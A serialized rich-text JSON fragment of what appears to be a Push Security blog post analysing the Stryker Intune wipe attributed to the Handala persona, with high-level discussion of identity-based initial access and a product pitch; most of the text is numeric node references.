",[],{},{"nodeType":1364,"data":10668,"content":10670},{"uri":10669},"https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/monitor-audit-logs",[10671],{"nodeType":1257,"value":10672,"marks":10673,"data":10674},"logs do record",[],{},{"nodeType":1257,"value":10676,"marks":10677,"data":10678}," \"wipe ManagedDevice\" events, but may not be linked to real-time alerting. And the underlying action, Intune's Remote Wipe, is a legitimate feature used routinely in enterprise IT. 
Again, the attack could have succeeded even with these controls in place.",[],{},{"nodeType":1258,"data":10680,"content":10681},{},[10682],{"nodeType":1257,"value":10683,"marks":10684,"data":10685},"In a world where a compromised account can be rapidly exploited, it's vital to focus on improving detection and prevention as early as possible in the kill chain — combating initial access techniques themselves.",[],{},{"nodeType":1335,"data":10687,"content":10690},{"target":10688},{"sys":10689},{"id":9489,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":10692,"content":10693},{},[],{"nodeType":1311,"data":10695,"content":10696},{},[10697],{"nodeType":1257,"value":10698,"marks":10699,"data":10701},"Closing thoughts",[10700],{"type":1318},{},{"nodeType":1258,"data":10703,"content":10704},{},[10705],{"nodeType":1257,"value":10706,"marks":10707,"data":10708},"The Stryker attack reflects what attackers everywhere — from financially motivated criminal groups to more destructive nation-state operators — are already doing. Identity-based initial access, abuse of legitimate tools and services, and living-off-the-land execution are the current standard operating procedure.",[],{},{"nodeType":1258,"data":10710,"content":10711},{},[10712],{"nodeType":1257,"value":10713,"marks":10714,"data":10715},"Even with a perfectly hardened environment, most public breaches today involve attackers hijacking SSO mechanisms to move into connected applications, exfiltrating data for resale or extortion, and in some cases leveraging cloud services and admin platforms to deploy ransomware (the Scattered Spider playbook of dropping ransomware via the VMware management portal being a well-documented example).",[],{},{"nodeType":1258,"data":10717,"content":10718},{},[10719],{"nodeType":1257,"value":10720,"marks":10721,"data":10722},"The majority of attackers will have no interest in destructively wiping an Intune environment — that's difficult to monetize. 
But the techniques that enabled the Stryker wipe are the same as those that enable financially motivated breaches at scale, pointing to a challenge that extends well beyond Iran-nexus threat actors and MDM hardening.",[],{},{"nodeType":1307,"data":10724,"content":10725},{},[],{"nodeType":1311,"data":10727,"content":10728},{},[10729],{"nodeType":1257,"value":9670,"marks":10730,"data":10732},[10731],{"type":1318},{},{"nodeType":1258,"data":10734,"content":10735},{},[10736],{"nodeType":1257,"value":10737,"marks":10738,"data":10739},"Push Security's browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack 
surface.",[],{},{"nodeType":1258,"data":10741,"content":10742},{},[10743,10746,10752,10755,10761,10764,10770],{"nodeType":1257,"value":2223,"marks":10744,"data":10745},[],{},{"nodeType":1364,"data":10747,"content":10748},{"uri":2228},[10749],{"nodeType":1257,"value":2231,"marks":10750,"data":10751},[],{},{"nodeType":1257,"value":3548,"marks":10753,"data":10754},[],{},{"nodeType":1364,"data":10756,"content":10757},{"uri":3737},[10758],{"nodeType":1257,"value":6347,"marks":10759,"data":10760},[],{},{"nodeType":1257,"value":3744,"marks":10762,"data":10763},[],{},{"nodeType":1364,"data":10765,"content":10766},{"uri":2241},[10767],{"nodeType":1257,"value":2244,"marks":10768,"data":10769},[],{},{"nodeType":1257,"value":2249,"marks":10771,"data":10772},[],{},{"entries":10774},{"hyperlink":10775,"inline":10776,"block":10777},[],[],[10778,10792,10810],{"sys":10779,"__typename":6371,"content":10780,"name":10791,"title":118},{"id":9881},{"json":10781},{"nodeType":1259,"data":10782,"content":10783},{},[10784],{"nodeType":1258,"data":10785,"content":10786},{},[10787],{"nodeType":1257,"value":10788,"marks":10789,"data":10790},"Handala is a public-facing \"faketivist\" persona, also known as Handala Hack Team, Void Manticore, Storm-0842, Dune, Red Sandstorm, and Banished Kitten. The group also operates under regional personas like Karma and Homeland Justice. We'll refer to them as Handala in this piece.",[],{},"Handala blog insight box 1",{"sys":10793,"__typename":6371,"content":10794,"name":10809,"title":118},{"id":10563},{"json":10795},{"nodeType":1259,"data":10796,"content":10797},{},[10798],{"nodeType":1258,"data":10799,"content":10800},{},[10801,10805],{"nodeType":1257,"value":10802,"marks":10803,"data":10804},"So, t",[],{},{"nodeType":1257,"value":10806,"marks":10807,"data":10808},"he Stryker attack path is operationally consistent with the direction the Iranian threat ecosystem has been moving, even though it departs from Handala's own documented TTPs. 
Many of Handala's previous methods — targeting managed service providers and IT vendors, malware spearphishing, VPN credential stuffing — can also be repurposed in identity-focused social engineering attacks, particularly when boosted with widely available tools already powering criminal campaigns.",[],{},"Handala blog insight box 3",{"sys":10811,"__typename":9827,"type":9828,"ctaText":9829,"buttonLabel":9830,"buttonColour":9831,"buttonUrl":66},{"id":9489},{"items":10813},[10814],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":10815},{"url":2269},{"items":10817},[10818,11646,12394],{"__typename":1278,"sys":10819,"content":10820,"title":2252,"synopsis":2253,"hashTags":118,"publishedDate":2254,"slug":2255,"tagsCollection":11636,"authorsCollection":11642},{"id":1280},{"json":10821},{"nodeType":1259,"data":10822,"content":10823},{},[10824,10830,10836,10842,10845,10852,10858,10864,10869,10875,10880,10896,10902,10912,10915,10922,10928,10941,10947,10957,10962,10965,10972,10979,10984,10992,11008,11016,11022,11030,11045,11053,11059,11067,11093,11101,11107,11115,11131,11136,11144,11150,11158,11191,11194,11201,11209,11225,11233,11239,11247,11273,11278,11286,11292,11297,11300,11307,11315,11321,11372,11377,11380,11387,11395,11401,11406,11409,11416,11422,11428,11488,11494,11549,11555,11558,11565,11571,11577,11582,11585,11592,11598,11604,11610],{"nodeType":1258,"data":10825,"content":10826},{},[10827],{"nodeType":1257,"value":1289,"marks":10828,"data":10829},[],{},{"nodeType":1258,"data":10831,"content":10832},{},[10833],{"nodeType":1257,"value":1296,"marks":10834,"data":10835},[],{},{"nodeType":1258,"data":10837,"content":10838},{},[10839],{"nodeType":1257,"value":1303,"marks":10840,"data":10841},[],{},{"nodeType":1307,"data":10843,"content":10844},{},[],{"nodeType":1311,"data":10846,"content":10847},{},[10848],{"nodeType":1257,"value":1315,"marks":10849,"data":10851},[10850],{"type":1318},{},{"nodeType":1258,"data":10853,"content":10854},{},[10855],{"nodeType"
:1257,"value":1324,"marks":10856,"data":10857},[],{},{"nodeType":1258,"data":10859,"content":10860},{},[10861],{"nodeType":1257,"value":1331,"marks":10862,"data":10863},[],{},{"nodeType":1335,"data":10865,"content":10868},{"target":10866},{"sys":10867},{"id":1339,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":10870,"content":10871},{},[10872],{"nodeType":1257,"value":1347,"marks":10873,"data":10874},[],{},{"nodeType":1335,"data":10876,"content":10879},{"target":10877},{"sys":10878},{"id":1354,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":10881,"content":10882},{},[10883,10886,10893],{"nodeType":1257,"value":1360,"marks":10884,"data":10885},[],{},{"nodeType":1364,"data":10887,"content":10888},{"uri":1366},[10889],{"nodeType":1257,"value":1369,"marks":10890,"data":10892},[10891],{"type":1372},{},{"nodeType":1257,"value":1375,"marks":10894,"data":10895},[],{},{"nodeType":1258,"data":10897,"content":10898},{},[10899],{"nodeType":1257,"value":1382,"marks":10900,"data":10901},[],{},{"nodeType":1258,"data":10903,"content":10904},{},[10905,10908],{"nodeType":1257,"value":1389,"marks":10906,"data":10907},[],{},{"nodeType":1257,"value":1393,"marks":10909,"data":10911},[10910],{"type":1318},{},{"nodeType":1307,"data":10913,"content":10914},{},[],{"nodeType":1311,"data":10916,"content":10917},{},[10918],{"nodeType":1257,"value":1404,"marks":10919,"data":10921},[10920],{"type":1318},{},{"nodeType":1258,"data":10923,"content":10924},{},[10925],{"nodeType":1257,"value":1412,"marks":10926,"data":10927},[],{},{"nodeType":1258,"data":10929,"content":10930},{},[10931,10934,10938],{"nodeType":1257,"value":1419,"marks":10932,"data":10933},[],{},{"nodeType":1257,"value":1423,"marks":10935,"data":10937},[10936],{"type":1318},{},{"nodeType":1257,"value":1428,"marks":10939,"data":10940},[],{},{"nodeType":1258,"data":10942,"content":10943},{},[10944],{"nodeType":1257,"value":1435,"marks":10945,"data":10946},[],{},{"nodeType":1258,"data":10948,"content":10949},{},[10950,109
53],{"nodeType":1257,"value":1442,"marks":10951,"data":10952},[],{},{"nodeType":1257,"value":1446,"marks":10954,"data":10956},[10955],{"type":1318},{},{"nodeType":1335,"data":10958,"content":10961},{"target":10959},{"sys":10960},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":10963,"content":10964},{},[],{"nodeType":1311,"data":10966,"content":10967},{},[10968],{"nodeType":1257,"value":1463,"marks":10969,"data":10971},[10970],{"type":1318},{},{"nodeType":1468,"data":10973,"content":10974},{},[10975],{"nodeType":1257,"value":1472,"marks":10976,"data":10978},[10977],{"type":1318},{},{"nodeType":1335,"data":10980,"content":10983},{"target":10981},{"sys":10982},{"id":1480,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":10985,"content":10986},{},[10987],{"nodeType":1257,"value":1486,"marks":10988,"data":10991},[10989,10990],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":10993,"content":10994},{},[10995,10998,11005],{"nodeType":1257,"value":1495,"marks":10996,"data":10997},[],{},{"nodeType":1364,"data":10999,"content":11000},{"uri":1500},[11001],{"nodeType":1257,"value":1503,"marks":11002,"data":11004},[11003],{"type":1372},{},{"nodeType":1257,"value":1508,"marks":11006,"data":11007},[],{},{"nodeType":1258,"data":11009,"content":11010},{},[11011],{"nodeType":1257,"value":1515,"marks":11012,"data":11015},[11013,11014],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11017,"content":11018},{},[11019],{"nodeType":1257,"value":1524,"marks":11020,"data":11021},[],{},{"nodeType":1258,"data":11023,"content":11024},{},[11025],{"nodeType":1257,"value":1531,"marks":11026,"data":11029},[11027,11028],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11031,"content":11032},{},[11033,11036,11042],{"nodeType":1257,"value":1540,"marks":11034,"data":11035},[],{},{"nodeType":1364,"data":11037,"content":11038},{"uri":1545},[11039],{"nodeType":1257,"value":1548,"marks":11040,"data":11041},[],{},{"nodeType":1257,"value":1552,"marks":11043,"data":1
1044},[],{},{"nodeType":1258,"data":11046,"content":11047},{},[11048],{"nodeType":1257,"value":1559,"marks":11049,"data":11052},[11050,11051],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11054,"content":11055},{},[11056],{"nodeType":1257,"value":1568,"marks":11057,"data":11058},[],{},{"nodeType":1258,"data":11060,"content":11061},{},[11062],{"nodeType":1257,"value":1575,"marks":11063,"data":11066},[11064,11065],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11068,"content":11069},{},[11070,11073,11080,11083,11090],{"nodeType":1257,"value":1584,"marks":11071,"data":11072},[],{},{"nodeType":1364,"data":11074,"content":11075},{"uri":1589},[11076],{"nodeType":1257,"value":1592,"marks":11077,"data":11079},[11078],{"type":1372},{},{"nodeType":1257,"value":1597,"marks":11081,"data":11082},[],{},{"nodeType":1364,"data":11084,"content":11085},{"uri":1602},[11086],{"nodeType":1257,"value":1605,"marks":11087,"data":11089},[11088],{"type":1372},{},{"nodeType":1257,"value":1610,"marks":11091,"data":11092},[],{},{"nodeType":1258,"data":11094,"content":11095},{},[11096],{"nodeType":1257,"value":1617,"marks":11097,"data":11100},[11098,11099],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11102,"content":11103},{},[11104],{"nodeType":1257,"value":1626,"marks":11105,"data":11106},[],{},{"nodeType":1258,"data":11108,"content":11109},{},[11110],{"nodeType":1257,"value":1633,"marks":11111,"data":11114},[11112,11113],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11116,"content":11117},{},[11118,11121,11128],{"nodeType":1257,"value":1642,"marks":11119,"data":11120},[],{},{"nodeType":1364,"data":11122,"content":11123},{"uri":1602},[11124],{"nodeType":1257,"value":1605,"marks":11125,"data":11127},[11126],{"type":1372},{},{"nodeType":1257,"value":1653,"marks":11129,"data":11130},[],{},{"nodeType":1335,"data":11132,"content":11135},{"target":11133},{"sys":11134},{"id":1660,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11137,"content":11138},{},[111
39],{"nodeType":1257,"value":1666,"marks":11140,"data":11143},[11141,11142],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11145,"content":11146},{},[11147],{"nodeType":1257,"value":1675,"marks":11148,"data":11149},[],{},{"nodeType":1258,"data":11151,"content":11152},{},[11153],{"nodeType":1257,"value":1682,"marks":11154,"data":11157},[11155,11156],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11159,"content":11160},{},[11161,11164,11170,11173,11179,11182,11188],{"nodeType":1257,"value":1691,"marks":11162,"data":11163},[],{},{"nodeType":1364,"data":11165,"content":11166},{"uri":1696},[11167],{"nodeType":1257,"value":1699,"marks":11168,"data":11169},[],{},{"nodeType":1257,"value":1703,"marks":11171,"data":11172},[],{},{"nodeType":1364,"data":11174,"content":11175},{"uri":1708},[11176],{"nodeType":1257,"value":1711,"marks":11177,"data":11178},[],{},{"nodeType":1257,"value":1715,"marks":11180,"data":11181},[],{},{"nodeType":1364,"data":11183,"content":11184},{"uri":1720},[11185],{"nodeType":1257,"value":1723,"marks":11186,"data":11187},[],{},{"nodeType":1257,"value":1727,"marks":11189,"data":11190},[],{},{"nodeType":1307,"data":11192,"content":11193},{},[],{"nodeType":1468,"data":11195,"content":11196},{},[11197],{"nodeType":1257,"value":1737,"marks":11198,"data":11200},[11199],{"type":1318},{},{"nodeType":1258,"data":11202,"content":11203},{},[11204],{"nodeType":1257,"value":1745,"marks":11205,"data":11208},[11206,11207],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11210,"content":11211},{},[11212,11215,11222],{"nodeType":1257,"value":1754,"marks":11213,"data":11214},[],{},{"nodeType":1364,"data":11216,"content":11217},{"uri":1759},[11218],{"nodeType":1257,"value":1762,"marks":11219,"data":11221},[11220],{"type":1372},{},{"nodeType":1257,"value":1767,"marks":11223,"data":11224},[],{},{"nodeType":1258,"data":11226,"content":11227},{},[11228],{"nodeType":1257,"value":1774,"marks":11229,"data":11232},[11230,11231],{"type":1318},{"type":1372},{}
,{"nodeType":1258,"data":11234,"content":11235},{},[11236],{"nodeType":1257,"value":1783,"marks":11237,"data":11238},[],{},{"nodeType":1258,"data":11240,"content":11241},{},[11242],{"nodeType":1257,"value":1790,"marks":11243,"data":11246},[11244,11245],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11248,"content":11249},{},[11250,11253,11260,11263,11270],{"nodeType":1257,"value":1799,"marks":11251,"data":11252},[],{},{"nodeType":1364,"data":11254,"content":11255},{"uri":1804},[11256],{"nodeType":1257,"value":1807,"marks":11257,"data":11259},[11258],{"type":1372},{},{"nodeType":1257,"value":1812,"marks":11261,"data":11262},[],{},{"nodeType":1364,"data":11264,"content":11265},{"uri":1817},[11266],{"nodeType":1257,"value":1820,"marks":11267,"data":11269},[11268],{"type":1372},{},{"nodeType":1257,"value":1825,"marks":11271,"data":11272},[],{},{"nodeType":1335,"data":11274,"content":11277},{"target":11275},{"sys":11276},{"id":1832,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11279,"content":11280},{},[11281],{"nodeType":1257,"value":1838,"marks":11282,"data":11285},[11283,11284],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11287,"content":11288},{},[11289],{"nodeType":1257,"value":1847,"marks":11290,"data":11291},[],{},{"nodeType":1335,"data":11293,"content":11296},{"target":11294},{"sys":11295},{"id":1854,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11298,"content":11299},{},[],{"nodeType":1468,"data":11301,"content":11302},{},[11303],{"nodeType":1257,"value":1863,"marks":11304,"data":11306},[11305],{"type":1318},{},{"nodeType":1258,"data":11308,"content":11309},{},[11310],{"nodeType":1257,"value":1871,"marks":11311,"data":11314},[11312,11313],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11316,"content":11317},{},[11318],{"nodeType":1257,"value":1880,"marks":11319,"data":11320},[],{},{"nodeType":1884,"data":11322,"content":11323},{},[11324,11337,11350],{"nodeType":1888,"data":11325,"content":11326},{},[11327],{"nodeType
":1258,"data":11328,"content":11329},{},[11330,11334],{"nodeType":1257,"value":1895,"marks":11331,"data":11333},[11332],{"type":1318},{},{"nodeType":1257,"value":1900,"marks":11335,"data":11336},[],{},{"nodeType":1888,"data":11338,"content":11339},{},[11340],{"nodeType":1258,"data":11341,"content":11342},{},[11343,11347],{"nodeType":1257,"value":1910,"marks":11344,"data":11346},[11345],{"type":1318},{},{"nodeType":1257,"value":1915,"marks":11348,"data":11349},[],{},{"nodeType":1888,"data":11351,"content":11352},{},[11353],{"nodeType":1258,"data":11354,"content":11355},{},[11356,11360,11363,11369],{"nodeType":1257,"value":1925,"marks":11357,"data":11359},[11358],{"type":1318},{},{"nodeType":1257,"value":1930,"marks":11361,"data":11362},[],{},{"nodeType":1364,"data":11364,"content":11365},{"uri":1935},[11366],{"nodeType":1257,"value":1938,"marks":11367,"data":11368},[],{},{"nodeType":1257,"value":1942,"marks":11370,"data":11371},[],{},{"nodeType":1335,"data":11373,"content":11376},{"target":11374},{"sys":11375},{"id":1949,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11378,"content":11379},{},[],{"nodeType":1468,"data":11381,"content":11382},{},[11383],{"nodeType":1257,"value":1958,"marks":11384,"data":11386},[11385],{"type":1318},{},{"nodeType":1258,"data":11388,"content":11389},{},[11390],{"nodeType":1257,"value":1966,"marks":11391,"data":11394},[11392,11393],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":11396,"content":11397},{},[11398],{"nodeType":1257,"value":1975,"marks":11399,"data":11400},[],{},{"nodeType":1335,"data":11402,"content":11405},{"target":11403},{"sys":11404},{"id":1982,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11407,"content":11408},{},[],{"nodeType":1311,"data":11410,"content":11411},{},[11412],{"nodeType":1257,"value":1991,"marks":11413,"data":11415},[11414],{"type":1318},{},{"nodeType":1258,"data":11417,"content":11418},{},[11419],{"nodeType":1257,"value":1999,"marks":11420,"data":11421},[],{},{"nodeType":1258,"
data":11423,"content":11424},{},[11425],{"nodeType":1257,"value":2006,"marks":11426,"data":11427},[],{},{"nodeType":1884,"data":11429,"content":11430},{},[11431,11450,11469],{"nodeType":1888,"data":11432,"content":11433},{},[11434],{"nodeType":1258,"data":11435,"content":11436},{},[11437,11440,11447],{"nodeType":1257,"value":2019,"marks":11438,"data":11439},[],{},{"nodeType":1364,"data":11441,"content":11442},{"uri":2024},[11443],{"nodeType":1257,"value":2027,"marks":11444,"data":11446},[11445],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":11448,"data":11449},[],{},{"nodeType":1888,"data":11451,"content":11452},{},[11453],{"nodeType":1258,"data":11454,"content":11455},{},[11456,11459,11466],{"nodeType":1257,"value":2042,"marks":11457,"data":11458},[],{},{"nodeType":1364,"data":11460,"content":11461},{"uri":2047},[11462],{"nodeType":1257,"value":2050,"marks":11463,"data":11465},[11464],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":11467,"data":11468},[],{},{"nodeType":1888,"data":11470,"content":11471},{},[11472],{"nodeType":1258,"data":11473,"content":11474},{},[11475,11478,11485],{"nodeType":1257,"value":2064,"marks":11476,"data":11477},[],{},{"nodeType":1364,"data":11479,"content":11480},{"uri":2069},[11481],{"nodeType":1257,"value":2072,"marks":11482,"data":11484},[11483],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":11486,"data":11487},[],{},{"nodeType":1258,"data":11489,"content":11490},{},[11491],{"nodeType":1257,"value":2083,"marks":11492,"data":11493},[],{},{"nodeType":1884,"data":11495,"content":11496},{},[11497,11510,11523,11536],{"nodeType":1888,"data":11498,"content":11499},{},[11500],{"nodeType":1258,"data":11501,"content":11502},{},[11503,11507],{"nodeType":1257,"value":2096,"marks":11504,"data":11506},[11505],{"type":1318},{},{"nodeType":1257,"value":2101,"marks":11508,"data":11509},[],{},{"nodeType":1888,"data":11511,"content":11512},{},[11513],{"nodeType":1258,"data":11514,"content":11515},{},[11516,11520],{"nodeType":1257
,"value":2111,"marks":11517,"data":11519},[11518],{"type":1318},{},{"nodeType":1257,"value":2116,"marks":11521,"data":11522},[],{},{"nodeType":1888,"data":11524,"content":11525},{},[11526],{"nodeType":1258,"data":11527,"content":11528},{},[11529,11533],{"nodeType":1257,"value":2126,"marks":11530,"data":11532},[11531],{"type":1318},{},{"nodeType":1257,"value":2131,"marks":11534,"data":11535},[],{},{"nodeType":1888,"data":11537,"content":11538},{},[11539],{"nodeType":1258,"data":11540,"content":11541},{},[11542,11546],{"nodeType":1257,"value":2141,"marks":11543,"data":11545},[11544],{"type":1318},{},{"nodeType":1257,"value":2146,"marks":11547,"data":11548},[],{},{"nodeType":1258,"data":11550,"content":11551},{},[11552],{"nodeType":1257,"value":2153,"marks":11553,"data":11554},[],{},{"nodeType":1307,"data":11556,"content":11557},{},[],{"nodeType":1311,"data":11559,"content":11560},{},[11561],{"nodeType":1257,"value":2163,"marks":11562,"data":11564},[11563],{"type":1318},{},{"nodeType":1258,"data":11566,"content":11567},{},[11568],{"nodeType":1257,"value":2171,"marks":11569,"data":11570},[],{},{"nodeType":1258,"data":11572,"content":11573},{},[11574],{"nodeType":1257,"value":2178,"marks":11575,"data":11576},[],{},{"nodeType":1335,"data":11578,"content":11581},{"target":11579},{"sys":11580},{"id":2185,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11583,"content":11584},{},[],{"nodeType":1311,"data":11586,"content":11587},{},[11588],{"nodeType":1257,"value":2194,"marks":11589,"data":11591},[11590],{"type":1318},{},{"nodeType":1258,"data":11593,"content":11594},{},[11595],{"nodeType":1257,"value":2202,"marks":11596,"data":11597},[],{},{"nodeType":1258,"data":11599,"content":11600},{},[11601],{"nodeType":1257,"value":2209,"marks":11602,"data":11603},[],{},{"nodeType":1258,"data":11605,"content":11606},{},[11607],{"nodeType":1257,"value":2216,"marks":11608,"data":11609},[],{},{"nodeType":1258,"data":11611,"content":11612},{},[11613,11616,11623,11626,11633],{"nodeTy
pe":1257,"value":2223,"marks":11614,"data":11615},[],{},{"nodeType":1364,"data":11617,"content":11618},{"uri":2228},[11619],{"nodeType":1257,"value":2231,"marks":11620,"data":11622},[11621],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":11624,"data":11625},[],{},{"nodeType":1364,"data":11627,"content":11628},{"uri":2241},[11629],{"nodeType":1257,"value":2244,"marks":11630,"data":11632},[11631],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":11634,"data":11635},[],{},{"items":11637},[11638,11640],{"sys":11639,"name":1270},{"id":1269},{"sys":11641,"name":1274},{"id":1273},{"items":11643},[11644],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":11645},{"url":2269},{"__typename":1278,"sys":11647,"content":11648,"title":3125,"synopsis":3126,"hashTags":118,"publishedDate":3127,"slug":3128,"tagsCollection":12384,"authorsCollection":12390},{"id":2272},{"json":11649},{"nodeType":1259,"data":11650,"content":11651},{},[11652,11659,11665,11671,11677,11687,11693,11698,11703,11706,11713,11719,11725,11730,11746,11752,11757,11763,11768,11774,11813,11818,11823,11829,11835,11838,11845,11861,11867,11872,11888,11893,11909,11915,11918,11925,11931,11967,11977,11980,11987,12002,12008,12021,12027,12033,12038,12044,12047,12054,12060,12108,12114,12117,12124,12129,12135,12141,12146,12152,12181,12187,12193,12198,12204,12209,12216,12232,12238,12268,12274,12304,12307,12314,12320,12325,12341,12347,12373,12378],{"nodeType":1311,"data":11653,"content":11654},{},[11655],{"nodeType":1257,"value":2281,"marks":11656,"data":11658},[11657],{"type":1318},{},{"nodeType":1258,"data":11660,"content":11661},{},[11662],{"nodeType":1257,"value":2289,"marks":11663,"data":11664},[],{},{"nodeType":1258,"data":11666,"content":11667},{},[11668],{"nodeType":1257,"value":2296,"marks":11669,"data":11670},[],{},{"nodeType":1258,"data":11672,"content":11673},{},[11674],{"nodeType":1257,"value":2303,"marks":11675,"data":11676},[],{},{"nodeType":1258,"data":11678,"content":11679},{},[11680,
11684],{"nodeType":1257,"value":2310,"marks":11681,"data":11683},[11682],{"type":1318},{},{"nodeType":1257,"value":2315,"marks":11685,"data":11686},[],{},{"nodeType":1258,"data":11688,"content":11689},{},[11690],{"nodeType":1257,"value":2322,"marks":11691,"data":11692},[],{},{"nodeType":1335,"data":11694,"content":11697},{"target":11695},{"sys":11696},{"id":2329,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":11699,"content":11702},{"target":11700},{"sys":11701},{"id":2335,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":11704,"content":11705},{},[],{"nodeType":1311,"data":11707,"content":11708},{},[11709],{"nodeType":1257,"value":2344,"marks":11710,"data":11712},[11711],{"type":1318},{},{"nodeType":1258,"data":11714,"content":11715},{},[11716],{"nodeType":1257,"value":2352,"marks":11717,"data":11718},[],{},{"nodeType":1258,"data":11720,"content":11721},{},[11722],{"nodeType":1257,"value":2359,"marks":11723,"data":11724},[],{},{"nodeType":1335,"data":11726,"content":11729},{"target":11727},{"sys":11728},{"id":2366,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11731,"content":11732},{},[11733,11736,11743],{"nodeType":1257,"value":2372,"marks":11734,"data":11735},[],{},{"nodeType":1364,"data":11737,"content":11738},{"uri":2377},[11739],{"nodeType":1257,"value":2380,"marks":11740,"data":11742},[11741],{"type":1372},{},{"nodeType":1257,"value":2385,"marks":11744,"data":11745},[],{},{"nodeType":1258,"data":11747,"content":11748},{},[11749],{"nodeType":1257,"value":2392,"marks":11750,"data":11751},[],{},{"nodeType":1335,"data":11753,"content":11756},{"target":11754},{"sys":11755},{"id":2399,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11758,"content":11759},{},[11760],{"nodeType":1257,"value":2405,"marks":11761,"data":11762},[],{},{"nodeType":1335,"data":11764,"content":11767},{"target":11765},{"sys":11766},{"id":2412,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11769,"content":11770},{},[11771],{"nodeType":1257,"value":2418,
"marks":11772,"data":11773},[],{},{"nodeType":1884,"data":11775,"content":11776},{},[11777,11786,11795,11804],{"nodeType":1888,"data":11778,"content":11779},{},[11780],{"nodeType":1258,"data":11781,"content":11782},{},[11783],{"nodeType":1257,"value":2431,"marks":11784,"data":11785},[],{},{"nodeType":1888,"data":11787,"content":11788},{},[11789],{"nodeType":1258,"data":11790,"content":11791},{},[11792],{"nodeType":1257,"value":2441,"marks":11793,"data":11794},[],{},{"nodeType":1888,"data":11796,"content":11797},{},[11798],{"nodeType":1258,"data":11799,"content":11800},{},[11801],{"nodeType":1257,"value":2451,"marks":11802,"data":11803},[],{},{"nodeType":1888,"data":11805,"content":11806},{},[11807],{"nodeType":1258,"data":11808,"content":11809},{},[11810],{"nodeType":1257,"value":2461,"marks":11811,"data":11812},[],{},{"nodeType":1335,"data":11814,"content":11817},{"target":11815},{"sys":11816},{"id":2468,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":11819,"content":11822},{"target":11820},{"sys":11821},{"id":2474,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11824,"content":11825},{},[11826],{"nodeType":1257,"value":2480,"marks":11827,"data":11828},[],{},{"nodeType":1258,"data":11830,"content":11831},{},[11832],{"nodeType":1257,"value":2487,"marks":11833,"data":11834},[],{},{"nodeType":1307,"data":11836,"content":11837},{},[],{"nodeType":1311,"data":11839,"content":11840},{},[11841],{"nodeType":1257,"value":2497,"marks":11842,"data":11844},[11843],{"type":1318},{},{"nodeType":1258,"data":11846,"content":11847},{},[11848,11851,11858],{"nodeType":1257,"value":2505,"marks":11849,"data":11850},[],{},{"nodeType":1364,"data":11852,"content":11853},{"uri":2510},[11854],{"nodeType":1257,"value":2513,"marks":11855,"data":11857},[11856],{"type":1372},{},{"nodeType":1257,"value":2518,"marks":11859,"data":11860},[],{},{"nodeType":1258,"data":11862,"content":11863},{},[11864],{"nodeType":1257,"value":2525,"marks":11865,"data":11866},[],{},{"nodeType":1335,"d
ata":11868,"content":11871},{"target":11869},{"sys":11870},{"id":2532,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11873,"content":11874},{},[11875,11878,11885],{"nodeType":1257,"value":2538,"marks":11876,"data":11877},[],{},{"nodeType":1364,"data":11879,"content":11880},{"uri":2543},[11881],{"nodeType":1257,"value":2546,"marks":11882,"data":11884},[11883],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":11886,"data":11887},[],{},{"nodeType":1335,"data":11889,"content":11892},{"target":11890},{"sys":11891},{"id":2557,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":11894,"content":11895},{},[11896,11899,11906],{"nodeType":1257,"value":2563,"marks":11897,"data":11898},[],{},{"nodeType":1364,"data":11900,"content":11901},{"uri":2568},[11902],{"nodeType":1257,"value":2571,"marks":11903,"data":11905},[11904],{"type":1372},{},{"nodeType":1257,"value":2576,"marks":11907,"data":11908},[],{},{"nodeType":1258,"data":11910,"content":11911},{},[11912],{"nodeType":1257,"value":2583,"marks":11913,"data":11914},[],{},{"nodeType":1307,"data":11916,"content":11917},{},[],{"nodeType":1311,"data":11919,"content":11920},{},[11921],{"nodeType":1257,"value":2593,"marks":11922,"data":11924},[11923],{"type":1318},{},{"nodeType":1258,"data":11926,"content":11927},{},[11928],{"nodeType":1257,"value":2601,"marks":11929,"data":11930},[],{},{"nodeType":1258,"data":11932,"content":11933},{},[11934,11937,11944,11947,11954,11957,11964],{"nodeType":1257,"value":2608,"marks":11935,"